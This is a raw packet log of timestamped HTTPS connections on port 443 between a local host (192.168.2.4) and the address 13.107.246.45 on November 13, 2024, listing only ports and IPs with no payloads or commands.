Nov 13, 2024 18:44:39.858165979 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.860841990 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.861206055 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.861264944 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.861613035 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.861627102 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.896322966 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.896676064 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.896699905 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.897104979 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.897113085 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.923477888 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.923544884 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.923603058 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.923640966 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.923707008 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.923789024 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.923789024 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.923830032 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.923858881 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.926906109 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.926995039 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.927088022 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.927242041 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.927283049 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.990611076 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.990643024 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.990695000 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.990972996 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.992074966 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.992074966 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.992120028 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.992197990 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.993386984 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.993431091 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.993526936 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.993650913 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.993659019 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.019139051 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.019292116 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.019537926 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.019537926 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.019537926 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.021728992 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.021816015 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.021924019 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.022007942 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.022033930 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.030024052 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.030189037 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.030246973 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.033183098 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.033201933 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.033217907 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.033226013 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.035672903 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.035716057 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.035798073 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.035939932 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.035959959 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.326019049 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.326056957 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.379607916 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.380069971 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.380134106 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.380578995 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.380593061 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.510751009 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.510819912 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.510931015 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.511090040 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.511090040 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.511198044 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.511198044 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.511238098 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.511276960 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.514853001 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.514949083 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.515052080 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.515188932 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.515208960 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.651489019 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.652282000 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.652347088 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.652894974 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.652951956 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.764627934 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.765202045 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.765245914 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.765770912 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.765778065 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.765974045 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.766318083 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.766382933 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.766766071 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.766779900 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.778914928 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.779145956 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.779362917 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.779689074 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.779689074 CET	49928	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.779757977 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.779795885 CET	443	49928	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.783227921 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.783271074 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.783361912 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.783518076 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.783530951 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.784277916 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.784717083 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.784748077 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.785300970 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.785331011 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.895726919 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.895802975 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.895873070 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.896083117 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.896127939 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.896162987 CET	49930	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.896179914 CET	443	49930	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.899472952 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.899560928 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.899653912 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.899868965 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.899902105 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.902951956 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.903681040 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.903718948 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.903744936 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.903786898 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.903825045 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.903846025 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.903861046 CET	49929	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.903867960 CET	443	49929	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.906888008 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.906915903 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.906990051 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.907242060 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.907255888 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.928612947 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.928781986 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.928838968 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.929020882 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.929027081 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.929040909 CET	49931	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.929044962 CET	443	49931	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.931710958 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.931730986 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:40.931797981 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.932019949 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:40.932038069 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.257560015 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.258208990 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.258279085 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.258639097 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.258651972 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.626801014 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.626877069 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.626957893 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.626988888 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.627053976 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.627260923 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.627295017 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.627351999 CET	49932	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.627367020 CET	443	49932	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.630409002 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.630498886 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.630611897 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.630944014 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.631033897 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.756447077 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.757107973 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.757132053 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.757503033 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.757510900 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.760540962 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.760834932 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.760857105 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.761127949 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.761133909 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.763377905 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.763685942 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.763705969 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.764019966 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.764025927 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.768978119 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.769304991 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.769365072 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.769639969 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.769654989 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.887720108 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.887742043 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.887778997 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.887938976 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.887938976 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.888336897 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.888336897 CET	49935	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.888360977 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.888371944 CET	443	49935	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.891333103 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.891419888 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.891535997 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.891738892 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.891777039 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.894846916 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.894996881 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.895064116 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.895092010 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.895102978 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.895113945 CET	49933	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.895118952 CET	443	49933	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.896060944 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.896213055 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.896291018 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.896541119 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.896574020 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.896600962 CET	49934	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.896615982 CET	443	49934	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.897448063 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.897535086 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.897783995 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.897783995 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.897921085 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.898782969 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.898797035 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.898870945 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.899019003 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.899033070 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.902487993 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.902650118 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.902746916 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.902828932 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.902829885 CET	49936	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.902872086 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.902899981 CET	443	49936	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.905411959 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.905463934 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:41.905544043 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.905642986 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:41.905661106 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.386971951 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.387562990 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.387626886 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.388201952 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.388257027 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.523415089 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.524015903 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.524094105 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.524137974 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.524182081 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.524250984 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.524300098 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.524300098 CET	49937	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.524326086 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.524349928 CET	443	49937	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.526773930 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.526803017 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.526890039 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.526993990 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.527002096 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.632282019 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.632814884 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.632875919 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.633380890 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.633395910 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.649327040 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.649789095 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.649818897 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.650001049 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.650115967 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.650122881 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.650413036 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.650475979 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.650540113 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.650553942 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.681668043 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.682034969 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.682100058 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.682378054 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.682391882 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.766901016 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.766941071 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.767026901 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.767122030 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.767143011 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.767158031 CET	49938	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.767164946 CET	443	49938	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.769138098 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.769229889 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.769324064 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.769433022 CET	49943	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.769452095 CET	443	49943	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.781737089 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.781796932 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.781896114 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.781907082 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.781950951 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.782109022 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.782123089 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.782165051 CET	49940	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.782171011 CET	443	49940	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.782283068 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.782459021 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.782632113 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.782633066 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.782633066 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.786403894 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.786492109 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.786588907 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.787198067 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.787291050 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.787369013 CET	49944	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.787408113 CET	443	49944	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.787427902 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.787548065 CET	49945	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.787580013 CET	443	49945	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.817194939 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.817447901 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.817567110 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.817653894 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.817708015 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.817749023 CET	49941	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.817765951 CET	443	49941	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.820410967 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.820498943 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:42.820614100 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.820791960 CET	49946	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:42.820815086 CET	443	49946	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.091646910 CET	49939	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.091711998 CET	443	49939	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.302908897 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.303292036 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.303307056 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.303822041 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.303828001 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.438304901 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.438455105 CET	443	49942	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:43.438698053 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.438901901 CET	49942	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:43.438901901 CET	49942	443	192.168.2.4	13.107.246.45
